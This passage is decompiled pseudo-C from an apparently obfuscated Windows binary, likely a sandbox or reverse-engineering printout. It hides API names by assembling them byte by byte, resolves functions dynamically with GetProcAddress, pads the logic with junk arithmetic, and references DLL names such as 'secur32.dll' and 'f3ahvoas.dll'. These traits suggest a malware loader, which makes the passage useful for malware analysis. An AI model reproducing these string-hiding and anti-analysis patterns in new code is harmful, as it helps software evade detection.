					_v90 =  *_t2339;
					if(_v90 + 0x9f - 0x1a < 0) {
						_v90 = _v90 - 0x20;
					}
					_t2344 =  *0x8a9f40; // 0x8b0925
					_v91 =  *_t2344;
					if(_v91 + 0x9f - 0x1a < 0) {
						_v91 = _v91 - 0x20;
					}
					E0040A3C0(0);
					_push(_v716);
					E0040A3C0(0);
					_push(_v720);
					E0040A3C0(0);
					_push(_v724);
					E0040A3C0(0);
					_push(_v728);
					E0040A3C0(0);
					_push(_v732);
					E0040A3C0(0);
					_push(_v736);
					E0040A3C0(0);
					_push(_v740);
					E0040A3C0(0);
					_push(_v744);
					E0040A3C0(0);
					_push(_v748);
					E0040A3C0(0);
					_push(_v752);
					E0040A3C0(0);
					_push(_v756);
					E0040A3C0(0);
					_push(_v760);
					E0040A3C0(0);
					_push(_v764);
					E0040A3C0(0);
					_push(_v768);
					E0040A3C0(0);
					_push(_v772);
					E0040A3C0(0);
					_push(_v776);
					E0040A3C0(0);
					_push(_v780);
					E0040A3C0(0);
					_push(_v784);
					E0040A3C0(0);
					_push(_v788);
					E0040A494( &_v712, _t3910, 0x13, _t5187, _t5188);
					 *0x8b11dc = GetProcAddress(_v8, E0040A594(_v712));
					_v68 = 0;
					do {
						_t2394 =  *0x8a9ce4; // 0x8b0912
						_v92 =  *_t2394;
						if(_v92 + 0x9f - 0x1a < 0) {
							_v92 = _v92 - 0x20;
						}
						_t2399 =  *0x8a9f14; // 0x8b0922
						_v93 =  *_t2399;
						if(_v93 + 0x9f - 0x1a < 0) {
							_v93 = _v93 - 0x20;
						}
						_t2404 =  *0x8a9fbc; // 0x8b0929
						_v94 =  *_t2404;
						if(_v94 + 0x9f - 0x1a < 0) {
							_v94 = _v94 - 0x20;
						}
						E0040A3C0(0);
						_push(_v796);
						E0040A3C0(0);
						_push(_v800);
						E0040A3C0(0);
						_push(_v804);
						E0040A3C0(0);
						_push(_v808);
						E0040A3C0(0);
						_push(_v812);
						E0040A3C0(0);
						_push(_v816);
						E0040A3C0(0);
						_push(_v820);
						E0040A3C0(0);
						_push(_v824);
						E0040A3C0(0);
						_push(_v828);
						E0040A3C0(0);
						_push(_v832);
						E0040A3C0(0);
						_push(_v836);
						E0040A3C0(0);
						_push(_v840);
						E0040A3C0(0);
						_push(_v844);
						E0040A3C0(0);
						_push(_v848);
						E0040A3C0(0);
						_push(_v852);
						E0040A3C0(0);
						_push(_v856);
						_push(0x86f534);
						E0040A3C0(0);
						_push(_v860);
						E0040A3C0(0);
						_push(_v864);
						E0040A3C0(0);
						E0040A494( &_v792, _t3910, 0x14, _t5187, _t5188);
						E0040A9E8( &_v12, _v792, _v868);
						_v68 = _v68 + 1;
					} while (_v68 != 3);
					_t2451 =  *0x8a9ba4; // 0x9636d1f4
					 *0x8a9ba4 = E00407278(_t2451);
					_t2453 =  *0x8a9a34; // 0x3ea7bd43
					 *0x8a9a34 = E00407278(_t2453);
					_t2455 =  *0x8a9a34; // 0x3ea7bd43
					_t5247 = _t2455 -  *0x8a9ba4; // 0x9636d1f4
					if(_t5247 <= 0) {
						_t2456 =  *0x8a9bbc; // 0x9636d2f7
						 *0x8a9b98 = _t2456;
						_t2457 =  *0x8a9a34; // 0x3ea7bd43
						__eflags = _t2457 -  *0x8a9b98; // 0x6c1f3d8e
						if(__eflags <= 0) {
							_t2458 =  *0x8a9ab4; // 0x5a3df0
							 *0x8a9b6c = _t2458 *  *0x8a9a3c;
							_t2460 =  *0x8a9a54; // 0xdd12409c
							 *0x8a9a84 = _t2460 +  *0x8a9b00;
							_t2462 =  *0x8a9b50; // 0x3ea7bd43
							 *0x8a9b3c = _t2462 +  *0x8a9a98;
							 *0x8a9a44 =  *0x8a9ab8 * 0x85;
							 *0x8a9ad8 =  *0x8a9b34 * 0x82;
							_t2466 =  *0x8a9b60; // 0xf477f20
							_t2467 = _t2466 + 4;
							__eflags = _t2467;
							_v424 = _t2467;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b5c = E004076F4();
						} else {
							_v44 = _v72 * 0x52;
							_v52 = _v48 + _v76;
							_t3691 =  *0x8a9b50; // 0x3ea7bd43
							 *0x8a9b90 = _t3691 *  *0x8a9a88;
							_t3693 =  *0x8a9b40; // 0xa8062ee0
							 *0x8a9a94 = _t3693 - 0xa2;
							_t3695 =  *0x8a9b30; // 0x46db6ea8
							_v424 = _t3695 + 0x6b;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b38 = E004076E8();
							 *0x8a9bbc = 0xce -  *0x8a9b5c;
						}
						_t2469 =  *0x8a9ab4; // 0x5a3df0
						 *0x8a9a34 = _t2469;
						__eflags = 0x51;
						 *0x8a9a54 = 0x51 -  *0x8a9a44;
					} else {
						_v56 = _v28 * 0xbe;
					}
					 *0x8a9aec = 0;
					E0085E4BC();
					 *0x8a9a68 =  *0x8a9a54 * 0xc1;
					_t2475 =  *0x8a9b84; // 0x3d5d8300
					 *0x8a9a88 = _t2475 + _t2475 + (_t2475 + _t2475) * 8;
					if(_v56 + _v60 <= _v60) {
						__eflags = _v56 - _v40;
						if(_v56 > _v40) {
							_t3675 =  *0x8a9a98; // 0xffffffea
							 *0x8a9b78 = _t3675 -  *0x8a9b24;
							_t3677 = E008A9A8C; // 0x3ec86c80
							 *0x8a9a84 = _t3677 + 0xb6;
							_t3679 =  *0x8a9a74; // 0xfde44ace
							 *0x8a9b28 = _t3679 +  *0x8a9b64;
							_t3681 =  *0x8a9b34; // 0x535bf358
							 *0x8a9a3c = _t3681 -  *0x8a9b94;
							_t3683 =  *0x8a9b98; // 0x6c1f3d8e
							 *0x8a9b1c = _t3683 - 0xdb;
							_t3685 =  *0x8a9a34 * 0x3e;
							__eflags = _t3685;
							 *0x8a9b94 = _t3685;
						}
					} else {
						 *0x8a9b28 = 0;
						E0085E4BC();
					}
					_t2481 =  *0x8a9f40; // 0x8b0925
					_v95 =  *_t2481;
					if(_v95 + 0x9f - 0x1a < 0) {
						_v95 = _v95 - 0x20;
					}
					_t2486 =  *0x8aa15c; // 0x8b091c
					_v96 =  *_t2486;
					if(_v96 + 0x9f - 0x1a < 0) {
						_v96 = _v96 - 0x20;
					}
					_t2491 =  *0x8aa1dc; // 0x8b0921
					_v97 =  *_t2491;
					if(_v97 + 0x9f - 0x1a < 0) {
						_v97 = _v97 - 0x20;
					}
					E0040A3C0(0);
					_push(_v876);
					E0040A3C0(0);
					_push(_v880);
					E0040A3C0(0);
					_push(_v884);
					E0040A3C0(0);
					_push(_v888);
					E0040A3C0(0);
					_push(_v892);
					E0040A3C0(0);
					_push(_v896);
					E0040A3C0(0);
					_push(_v900);
					E0040A3C0(0);
					_push(_v904);
					E0040A3C0(0);
					_push(_v908);
					E0040A3C0(0);
					_push(_v912);
					E0040A3C0(0);
					_push(_v916);
					E0040A3C0(0);
					_push(_v920);
					E0040A3C0(0);
					_push(_v924);
					E0040A3C0(0);
					_push(_v928);
					E0040A3C0(0);
					_push(_v932);
					E0040A494( &_v872, _t3910, 0xf, _t5187, _t5188);
					 *0x8b11e0 = GetProcAddress(_v8, E0040A594(_v872));
					_v44 = 0xc1 - _v76;
					_v68 = 0;
					while(_v68 < 0) {
						_v68 = _v68 + 1;
						_v48 = _v60 + 0x37;
						_v36 = 0;
						do {
							_v28 = _v40 - 0xed;
							_t3660 =  *0x8a9b00; // 0x23fd000
							_v424 = _t3660 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9ac8 = E004076F4();
							_t3663 =  *0x8a9ba4; // 0x9636d1f4
							_v424 = _t3663 + 0x1f;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b7c = E004076E8();
							_t3666 = E008A9A8C; // 0x3ec86c80
							 *0x8a9a6c = _t3666 + 0x1c;
							_t3668 =  *0x8a99e4; // 0xffdbe445
							 *0x8a9b20 = _t3668 *  *0x8a9ac8;
							_t3670 =  *0x8a9b38; // 0xfde44b1c
							 *0x8a99e0 = _t3670 -  *0x8a9a6c;
							_v36 = _v36 + 1;
						} while (_v36 != 0xe);
						_t3672 =  *0x8a9a6c; // 0xd2d18e86
						 *0x8a9b44 = _t3672 -  *0x8a9a74;
						_t3674 =  *0x8a9ba4; // 0x9636d1f4
						 *0x8a9b1c = _t3674;
					}
					E0040A0C0( &_v12, _v16);
					E0040A0C0( &_v12, _v20);
					_t2539 =  *0x8a9b70; // 0xfe23f735
					 *0x8a9ad8 = _t2539 - 0x9d;
					E0040A0C0( &_v12, L"NlsLexicons001a.dll");
					_t2543 =  *0x8a9f40; // 0x8b0925
					_v98 =  *_t2543;
					if(_v98 + 0x9f - 0x1a < 0) {
						_v98 = _v98 - 0x20;
					}
					_t2548 =  *0x8a9fd0; // 0x8b0917
					_v99 =  *_t2548;
					if(_v99 + 0x9f - 0x1a < 0) {
						_v99 = _v99 - 0x20;
					}
					_t2553 =  *0x8aa1dc; // 0x8b0921
					_v100 =  *_t2553;
					if(_v100 + 0x9f - 0x1a < 0) {
						_v100 = _v100 - 0x20;
					}
					E0040A3C0(0);
					_push(_v940);
					E0040A3C0(0);
					_push(_v944);
					E0040A3C0(0);
					_push(_v948);
					E0040A3C0(0);
					_push(_v952);
					E0040A3C0(0);
					_push(_v956);
					E0040A3C0(0);
					_push(_v960);
					E0040A3C0(0);
					_push(_v964);
					E0040A3C0(0);
					_push(_v968);
					E0040A3C0(0);
					_push(_v972);
					E0040A3C0(0);
					_push(_v976);
					E0040A3C0(0);
					_push(_v980);
					E0040A3C0(0);
					_push(_v984);
					E0040A3C0(0);
					_push(_v988);
					E0040A3C0(0);
					_push(_v992);
					E0040A494( &_v936, _t3910, 0xe, _t5187, _t5188);
					 *0x8b11e4 = GetProcAddress(_v8, E0040A594(_v936));
					_t2592 =  *0x8a9f40; // 0x8b0925
					_v101 =  *_t2592;
					if(_v101 + 0x9f - 0x1a < 0) {
						_v101 = _v101 - 0x20;
					}
					_t2597 =  *0x8aa15c; // 0x8b091c
					_v102 =  *_t2597;
					if(_v102 + 0x9f - 0x1a < 0) {
						_v102 = _v102 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1000);
					E0040A3C0(0);
					_push(_v1004);
					E0040A3C0(0);
					_push(_v1008);
					E0040A3C0(0);
					_push(_v1012);
					E0040A3C0(0);
					_push(_v1016);
					E0040A3C0(0);
					_push(_v1020);
					E0040A3C0(0);
					_push(_v1024);
					E0040A3C0(0);
					_push(_v1028);
					E0040A3C0(0);
					_push(_v1032);
					E0040A3C0(0);
					_push(_v1036);
					E0040A3C0(0);
					_push(_v1040);
					E0040A3C0(0);
					_push(_v1044);
					E0040A494( &_v996, _t3910, 0xc, _t5187, _t5188);
					 *0x8b11e8 = GetProcAddress(_v8, E0040A594(_v996));
					_t2632 =  *0x8a9f40; // 0x8b0925
					_v103 =  *_t2632;
					if(_v103 + 0x9f - 0x1a < 0) {
						_v103 = _v103 - 0x20;
					}
					_t2637 =  *0x8a9f40; // 0x8b0925
					_v104 =  *_t2637;
					if(_v104 + 0x9f - 0x1a < 0) {
						_v104 = _v104 - 0x20;
					}
					_t2642 =  *0x8aa0b4; // 0x8b091f
					_v105 =  *_t2642;
					if(_v105 + 0x9f - 0x1a < 0) {
						_v105 = _v105 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1052);
					E0040A3C0(0);
					_push(_v1056);
					E0040A3C0(0);
					_push(_v1060);
					E0040A3C0(0);
					_push(_v1064);
					E0040A3C0(0);
					_push(_v1068);
					E0040A3C0(0);
					_push(_v1072);
					E0040A3C0(0);
					_push(_v1076);
					E0040A3C0(0);
					_push(_v1080);
					E0040A3C0(0);
					_push(_v1084);
					E0040A3C0(0);
					_push(_v1088);
					E0040A3C0(0);
					_push(_v1092);
					E0040A3C0(0);
					_push(_v1096);
					E0040A3C0(0);
					_push(_v1100);
					E0040A3C0(0);
					_push(_v1104);
					E0040A3C0(0);
					_push(_v1108);
					E0040A494( &_v1048, _t3910, 0xf, _t5187, _t5188);
					 *0x8b124c = GetProcAddress(_v8, E0040A594(_v1048));
					_v52 = _v60 + 0x68;
					E0040A0C0( &_v12, _v16);
					_t2687 =  *0x8a99d4; // 0x0
					_v112 = _t2687;
					if(_v112 != 0) {
						_v112 =  *((intOrPtr*)(_v112 - 4));
					}
					if(_v112 == 0xea) {
						if(0x78 - _v60 < 0x20) {
							_v68 = _v56 + 0xea;
							asm("fild dword [ebp-0x14]");
							_v76 = E004076E8();
							E0040ACEC(_v12, 0, 1,  &_v12);
							_v44 = _v64 + 0x9a;
							E0040A0C0( &_v16, _v12);
							E0040ACEC(_v12, 0, 1,  &_v12);
						}
						_t5280 = _v64 + 0x25 - _v72;
						if(_v64 + 0x25 >= _v72) {
							__eflags = 0;
							E0040ACEC(_v12, 0, 1,  &_v16);
							_t3420 =  &_v412;
							_t4908 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3420 + 1)) =  *_t4908;
							 *_t3420 = 1;
							E0040A324( &_v416,  &_v412);
							_t3423 =  &_v420;
							_t4911 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3423 + 1)) =  *_t4911;
							 *_t3423 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3428 =  &_v420;
							_t4915 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3428 + 1)) =  *_t4915;
							 *_t3428 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							_t3433 =  &_v420;
							_t4919 =  *0x8aa0b4; // 0x8b091f
							 *((char*)(_t3433 + 1)) =  *_t4919;
							 *_t3433 = 1;
							E0040A34C( &_v432, 4,  &_v420);
							E0040A324( &_v440,  &_v432);
							_t3438 =  &_v420;
							_t4923 =  *0x8a9e00; // 0x8b091d
							 *((char*)(_t3438 + 1)) =  *_t4923;
							 *_t3438 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							_t3443 =  &_v420;
							_t4927 =  *0x8a9fd0; // 0x8b0917
							 *((char*)(_t3443 + 1)) =  *_t4927;
							 *_t3443 = 1;
							E0040A34C( &_v448, 6,  &_v420);
							E0040A324( &_v456,  &_v448);
							_t3448 =  &_v420;
							_t4931 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3448 + 1)) =  *_t4931;
							 *_t3448 = 1;
							E0040A34C( &_v456, 7,  &_v420);
							E0040A324( &_v468,  &_v456);
							_t3453 =  &_v420;
							_t4935 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3453 + 1)) =  *_t4935;
							 *_t3453 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							E0040A34C( &_v480, 9, 0x86f3d4);
							E0040A324( &_v492,  &_v480);
							_t3462 =  &_v420;
							_t4941 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3462 + 1)) =  *_t4941;
							 *_t3462 = 1;
							E0040A34C( &_v492, 0xa,  &_v420);
							E0040A324( &_v504,  &_v492);
							_t3467 =  &_v420;
							_t4945 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3467 + 1)) =  *_t4945;
							 *_t3467 = 1;
							E0040A34C( &_v504, 0xb,  &_v420);
							E0040A324( &_v520,  &_v504);
							_t3472 =  &_v420;
							_t4949 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3472 + 1)) =  *_t4949;
							 *_t3472 = 1;
							E0040A34C( &_v520, 0xc,  &_v420);
							E0040AA98( &_v520);
							E0040A0C0( &_v12, _v16);
							E0040A0C0( &_v16, L"f3ahvoas.dll");
							E0040A0C0( &_v20, _v16);
							E0040A0C0( &_v20, _v20);
						} else {
							E0040A0C0( &_v20, _v12);
							E0040A0C0( &_v12, L"secur32.dll");
							E0040A0C0( &_v12, _v12);
							E0040A0C0( &_v16, _v20);
							_t3493 =  &_v412;
							_t4961 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3493 + 1)) =  *_t4961;
							 *_t3493 = 1;
							E0040A324( &_v416,  &_v412);
							_t3496 =  &_v420;
							_t4964 =  *0x8aa104; // 0x8b0919
							 *((char*)(_t3496 + 1)) =  *_t4964;
							 *_t3496 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3501 =  &_v420;
							_t4968 =  *0x8a9fd0; // 0x8b0917
							 *((char*)(_t3501 + 1)) =  *_t4968;
							 *_t3501 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							E0040A34C( &_v432, 4, 0x86f590);
							E0040A324( &_v440,  &_v432);
							_t3510 =  &_v420;
							_t4974 =  *0x8a9fbc; // 0x8b0929
							 *((char*)(_t3510 + 1)) =  *_t4974;
							 *_t3510 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							_t3515 =  &_v420;
							_t4978 =  *0x8aa288; // 0x8b091b
							 *((char*)(_t3515 + 1)) =  *_t4978;
							 *_t3515 = 1;
							E0040A34C( &_v448, 6,  &_v420);
							E0040A324( &_v456,  &_v448);
							E0040A34C( &_v456, 7, 0x86f590);
							E0040A324( &_v468,  &_v456);
							_t3524 =  &_v420;
							_t4984 =  *0x8a9cf4; // 0x8b0911
							 *((char*)(_t3524 + 1)) =  *_t4984;
							 *_t3524 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							_t3529 =  &_v420;
							_t4988 =  *0x8a9fd0; // 0x8b0917
							 *((char*)(_t3529 + 1)) =  *_t4988;
							 *_t3529 = 1;
							E0040A34C( &_v480, 9,  &_v420);
							E0040A324( &_v492,  &_v480);
							_t3534 =  &_v420;
							_t4992 =  *0x8aa0b8; // 0x8b0928
							 *((char*)(_t3534 + 1)) =  *_t4992;
							 *_t3534 = 1;
							E0040A34C( &_v492, 0xa,  &_v420);
							E0040A324( &_v504,  &_v492);
							E0040A34C( &_v504, 0xb, 0x86f590);
							E0040A324( &_v520,  &_v504);
							_t3543 =  &_v420;
							_t4998 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3543 + 1)) =  *_t4998;
							 *_t3543 = 1;
							E0040A34C( &_v520, 0xc,  &_v420);
							E0040A324( &_v1132,  &_v520);
							_t3548 =  &_v420;
							_t5002 =  *0x8a9c3c; // 0x8b0918
							 *((char*)(_t3548 + 1)) =  *_t5002;
							 *_t3548 = 1;
							E0040A34C( &_v1132, 0xd,  &_v420);
							E0040A324( &_v1148,  &_v1132);
							_t3553 =  &_v420;
							_t5006 =  *0x8a9d58; // 0x8b0913
							 *((char*)(_t3553 + 1)) =  *_t5006;
							 *_t3553 = 1;
							E0040A34C( &_v1148, 0xe,  &_v420);
							E0040A324( &_v1164,  &_v1148);
							_t3558 =  &_v420;
							_t5010 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3558 + 1)) =  *_t5010;
							 *_t3558 = 1;
							E0040A34C( &_v1164, 0xf,  &_v420);
							E0040A324( &_v1184,  &_v1164);
							E0040A34C( &_v1184, 0x10, 0x86f590);
							E0040A324( &_v1204,  &_v1184);
							_t3567 =  &_v420;
							_t5016 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3567 + 1)) =  *_t5016;
							 *_t3567 = 1;
							E0040A34C( &_v1204, 0x11,  &_v420);
							E0040A324( &_v1224,  &_v1204);
							_t3572 =  &_v420;
							_t5020 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3572 + 1)) =  *_t5020;
							 *_t3572 = 1;
							E0040A34C( &_v1224, 0x12,  &_v420);
							E0040A324( &_v1244,  &_v1224);
							_t3577 =  &_v420;
							_t5024 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3577 + 1)) =  *_t5024;
							 *_t3577 = 1;
							E0040A34C( &_v1244, 0x13,  &_v420);
							E0040A324( &_v1268,  &_v1244);
							_t3582 =  &_v420;
							_t5028 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3582 + 1)) =  *_t5028;
							 *_t3582 = 1;
							E0040A34C( &_v1268, 0x14,  &_v420);
							E0040A324( &_v1292,  &_v1268);
							_t3587 =  &_v420;
							_t5032 =  *0x8a9f8c; // 0x8b0915
							 *((char*)(_t3587 + 1)) =  *_t5032;
							 *_t3587 = 1;
							E0040A34C( &_v1292, 0x15,  &_v420);
							E0040A324( &_v1316,  &_v1292);
							_t3592 =  &_v420;
							_t5036 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3592 + 1)) =  *_t5036;
							 *_t3592 = 1;
							E0040A34C( &_v1316, 0x16,  &_v420);
							E0040A324( &_v1340,  &_v1316);
							_t3597 =  &_v420;
							_t5040 =  *0x8a9c3c; // 0x8b0918
							 *((char*)(_t3597 + 1)) =  *_t5040;
							 *_t3597 = 1;
							E0040A34C( &_v1340, 0x17,  &_v420);
							E0040A324( &_v1368,  &_v1340);
							_t3602 =  &_v420;
							_t5044 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3602 + 1)) =  *_t5044;
							 *_t3602 = 1;
							E0040A34C( &_v1368, 0x18,  &_v420);
							E0040A324( &_v1396,  &_v1368);
							_t3607 =  &_v420;
							_t5048 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3607 + 1)) =  *_t5048;
							 *_t3607 = 1;
							E0040A34C( &_v1396, 0x19,  &_v420);
							E0040A324( &_v1424,  &_v1396);
							E0040A34C( &_v1424, 0x1a, 0x86f590);
							E0040A324( &_v1452,  &_v1424);
							_t3616 =  &_v420;
							_t5054 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3616 + 1)) =  *_t5054;
							 *_t3616 = 1;
							E0040A34C( &_v1452, 0x1b,  &_v420);
							E0040A444( &_v1116, 0,  &_v1452, _t5280);
							_push(_v1116);
							E006BA5A8(1,  &_v1456, _t5280);
							_push(_v1456);
							_push(0x86f5a0);
							E006BA5A8(1,  &_v1460, _t5280);
							_push(_v1460);
							_push(0x86f5a0);
							E006BA5A8(0,  &_v1464, _t5280);
							_push(_v1464);
							_push(0x86f534);
							E0040A3C0(0);
							_push(_v1468);
							E0040A3C0(0);
							_push(_v1472);
							E0040A3C0(0);
							E0040A494( &_v1112, _t3910, 0xa, _t5187, _t5188);
							E0040A9E8( &_v20, _v1112, _v1476);
							E0040A0C0( &_v16, L"systemcpl.dll");
						}
					}
					E0040A0C0( &_v12, _v16);
					E0040A0C0( &_v12, _v16);
					if(_v60 <= _v72) {
						E0040A0C0( &_v20, _v12);
					} else {
						E0040ACEC(_v20, 2, 1,  &_v12);
					}
					_t2695 =  *0x8a9f40; // 0x8b0925
					_v113 =  *_t2695;
					if(_v113 + 0x9f - 0x1a < 0) {
						_v113 = _v113 - 0x20;
					}
					_t2700 =  *0x8aa0b4; // 0x8b091f
					_v114 =  *_t2700;
					if(_v114 + 0x9f - 0x1a < 0) {
						_v114 = _v114 - 0x20;
					}
					_t2705 =  *0x8aa15c; // 0x8b091c
					_v115 =  *_t2705;
					if(_v115 + 0x9f - 0x1a < 0) {
						_v115 = _v115 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1484);
					E0040A3C0(0);
					_push(_v1488);
					E0040A3C0(0);
					_push(_v1492);
					E0040A3C0(0);
					_push(_v1496);
					E0040A3C0(0);
					_push(_v1500);
					E0040A3C0(0);
					_push(_v1504);
					E0040A3C0(0);
					_push(_v1508);
					E0040A3C0(0);
					_push(_v1512);
					E0040A3C0(0);
					_push(_v1516);
					E0040A3C0(0);
					_push(_v1520);
					E0040A3C0(0);
					_push(_v1524);
					E0040A3C0(0);
					_push(_v1528);
					E0040A3C0(0);
					_push(_v1532);
					E0040A494( &_v1480, _t3910, 0xd, _t5187, _t5188);
					 *0x8b1250 = GetProcAddress(_v8, E0040A594(_v1480));
					_v64 = 0;
					while(_v64 < 7) {
						_v64 = _v64 + 1;
						_v424 = _v60 + 4;
						asm("fild dword [ebp-0x1a4]");
						_v52 = E004076F4();
						 *0x8a9b2c = 0;
						E0085E4BC();
						_v48 = 0;
						if(_v48 < 0xc) {
							_v48 = _v48 + 1;
							asm("fild dword [ebp-0x18]");
							_v76 = E004076F4();
							asm("fild dword [ebp-0x40]");
							_v32 = E004076F4();
							_t3404 =  *0x8a9b54; // 0x3d5d8300
							 *0x8a9adc = _t3404 *  *0x8a9aa0;
							asm("fild dword [0x8a9b3c]");
							 *0x8a9bbc = E004076F4();
							_t3407 =  *0x8a9b68; // 0xf78b0ce5
							 *0x8a9ab8 = _t3407;
							_t3408 =  *0x8a9b20; // 0x1a6fc404
							 *0x8a9b58 = _t3408 -  *0x8a9b38;
						}
						if(0x4c - _v60 < 0xa2) {
							_t3392 =  *0x8a9b70; // 0xfe23f735
							 *0x8a9b94 = _t3392 - 0xdc;
							_t3394 =  *0x8a9b28; // 0x3d5d8347
							 *0x8a9aa4 = _t3394 *  *0x8a9b38;
							_t3396 =  *0x8a9b14; // 0xdd124098
							 *0x8a9b84 = _t3396 *  *0x8a9b68;
							_t3398 =  *0x8a9bb4; // 0xe040229e
							 *0x8a9abc = _t3398;
							_t3399 =  *0x8a9b28; // 0x3d5d8347
							 *0x8a9b68 = _t3399;
							_t3400 =  *0x8a9ac8; // 0x9636d2f3
							 *0x8a9a74 = _t3400 -  *0x8a9a5c;
						}
					}
					 *0x8a9aa4 = 0x33 -  *0x8a9a40;
					_t2745 =  *0x8a9a6c; // 0xd2d18e86
					 *0x8a9aa4 = _t2745;
					 *0x8a9b20 = 0;
					E0085E4BC();
					_t2748 =  *0x8a9a1c; // 0x0
					_v120 = _t2748;
					if(_v120 != 0) {
						_v120 =  *((intOrPtr*)(_v120 - 4));
					}
					if(_v120 != 7) {
						_t2749 =  *0x8a9b34; // 0x535bf358
						_t4649 =  *0x8a9a6c; // 0xd2d18e86
						__eflags = _t2749 +  *0x8a9b20 - _t4649 +  *0x8a9b34;
						if(_t2749 +  *0x8a9b20 < _t4649 +  *0x8a9b34) {
							_t3369 =  *0x8a9b80; // 0xdae75771
							 *0x8a9a5c = _t3369 -  *0x8a9b34;
							_t3371 =  *0x8a9b68; // 0xf78b0ce5
							 *0x8a9b4c = _t3371 -  *0x8a9b68;
							asm("fild dword [0x8a9b18]");
							 *0x8a9aa0 = E004076F4();
							_t3374 =  *0x8a9b44; // 0xd1f819c4
							 *0x8a9b38 = _t3374;
							_t3375 =  *0x8a9b6c; // 0x9636d26c
							 *0x8a9bbc = _t3375 - 0xc;
							_t3377 =  *0x8a9a50; // 0x21bb532
							_t3378 = _t3377 - 9;
							__eflags = _t3378;
							 *0x8a9aa0 = _t3378;
						}
					} else {
						_t3379 =  *0x8a99e0; // 0x5d9ca450
						 *0x8a9b84 = _t3379 + 0x4c;
					}
					_t2751 =  *0x8a9ba0; // 0x9636d2e0
					 *0x8a9b20 = _t2751 + 0x43;
					_t2753 =  *0x8a9f40; // 0x8b0925
					_v121 =  *_t2753;
					if(_v121 + 0x9f - 0x1a < 0) {
						_v121 = _v121 - 0x20;
					}
					_t2758 =  *0x8a9e34; // 0x8b091e
					_v122 =  *_t2758;
					if(_v122 + 0x9f - 0x1a < 0) {
						_v122 = _v122 - 0x20;
					}
					_t2763 =  *0x8aa0b4; // 0x8b091f
					_v123 =  *_t2763;
					if(_v123 + 0x9f - 0x1a < 0) {
						_v123 = _v123 - 0x20;
					}
					_t2768 =  *0x8aa104; // 0x8b0919
					_v124 =  *_t2768;
					if(_v124 + 0x9f - 0x1a < 0) {
						_v124 = _v124 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1540);
					E0040A3C0(0);
					_push(_v1544);
					E0040A3C0(0);
					_push(_v1548);
					E0040A3C0(0);
					_push(_v1552);
					E0040A3C0(0);
					_push(_v1556);
					E0040A3C0(0);
					_push(_v1560);
					E0040A3C0(0);
					_push(_v1564);
					E0040A3C0(0);
					_push(_v1568);
					E0040A3C0(0);
					_push(_v1572);
					E0040A3C0(0);
					_push(_v1576);
					E0040A3C0(0);
					_push(_v1580);
					E0040A3C0(0);
					_push(_v1584);
					E0040A3C0(0);
					_push(_v1588);
					E0040A3C0(0);
					_push(_v1592);
					E0040A3C0(0);
					_push(_v1596);
					E0040A3C0(0);
					_push(_v1600);
					E0040A3C0(0);
					_push(_v1604);
					E0040A494( &_v1536, _t3910, 0x11, _t5187, _t5188);
					 *0x8b1258 = GetProcAddress(_v8, E0040A594(_v1536));
					_v64 = 0;
					if(_v64 < 9) {
						_v64 = _v64 + 1;
						_t3366 =  *0x8a9a5c; // 0xf78b0ce5
						 *0x8a9b24 = _t3366;
						_v52 = _v44 - 0x6c;
					}
					_t2814 =  *0x8a9b34; // 0x535bf358
					_t5305 = _t2814 -  *0x8a9b4c; // 0x3d5d8266
					if(_t5305 > 0) {
						if(_v56 + _v60 != _v60) {
							asm("fild dword [0x8a9b6c]");
							 *0x8a9a58 = E004076E8();
							 *0x8a9b08 = 0xf1 -  *0x8a9b24;
							_t3329 =  *0x8a9b18; // 0x12e
							 *0x8a9b94 = _t3329 *  *0x8a9b6c;
							_t3331 =  *0x8a9ab8; // 0x3d5d8300
							 *0x8a9aa4 = _t3331 + E008A9A8C;
							_t3333 =  *0x8a9b2c; // 0xb9629498
							 *0x8a9b70 = _t3333;
							_t3334 =  *0x8a9a38; // 0x299e4f10
							_t3335 = _t3334 + 0x45;
							__eflags = _t3335;
							 *0x8a9a9c = _t3335;
						} else {
							_v68 = _v36 + 0xa6;
							_v424 = _v24 + 4;
							asm("fild dword [ebp-0x1a4]");
							_v76 = E004076F4();
							_v32 = _v28 * 0xd7;
							_t3360 =  *0x8a9bc0; // 0x23fd0ad
							 *0x8a9ae0 = _t3360 + 4;
							_t3362 =  *0x8a9ba0; // 0x9636d2e0
							 *0x8a9bbc = _t3362 *  *0x8a9bb0;
							_t3364 =  *0x8a9a34; // 0x3ea7bd43
